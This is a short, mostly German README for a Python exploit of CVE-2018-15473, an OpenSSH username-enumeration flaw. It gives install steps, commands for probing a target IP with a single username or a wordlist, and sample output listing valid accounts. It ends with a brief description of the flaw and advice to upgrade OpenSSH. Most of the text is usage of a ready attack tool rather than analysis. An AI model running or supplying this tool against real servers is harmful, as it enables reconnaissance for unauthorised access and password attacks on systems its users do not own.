
Python-basierter Exploit für CVE-2018-15473, der OpenSSH-Benutzernamenaufzählung über einen Authentifizierungsantwort-Orakel ermöglicht, mit Einzelbenutzer- und Wortlistenmodi.
SSH-Benutzernamen-Enumeration-Exploit (OpenSSH 2.3 < 7.7)
Bearbeitete Version des ursprünglichen Exploits: https://www.exploit-db.com/exploits/45233
#Install the requirements:
foo@bar:~$ pip3 install -r requirements.txt
#For single username:
foo@bar:~$ ./Exploit.py 192.168.1.20 -u root
[+] root is a valid username
#For multiple username:
foo@bar:~$ ./Exploit.py 192.168.1.20 -w username.txt
[+] root is a valid username
[-] mysql is an invalid username
[-] mike is an invalid username
[-] foo is an invalid username
[-] bar is an invalid username
Valid Users:
root
#For more option:
foo@bar:~$ ./Exploit.py -h
Das System reagiert unterschiedlich auf gültige und ungültige Authentifizierungsversuche. Ein entfernter Benutzer kann speziell gestaltete Anfragen senden, um gültige Benutzernamen auf dem Zielsystem zu ermitteln. Somit kann ein entfernter Benutzer gültige Benutzernamen auf dem Zielsystem bestimmen.
Der OpenSSH-Server sollte auf Version 7.7 oder höher aktualisiert werden.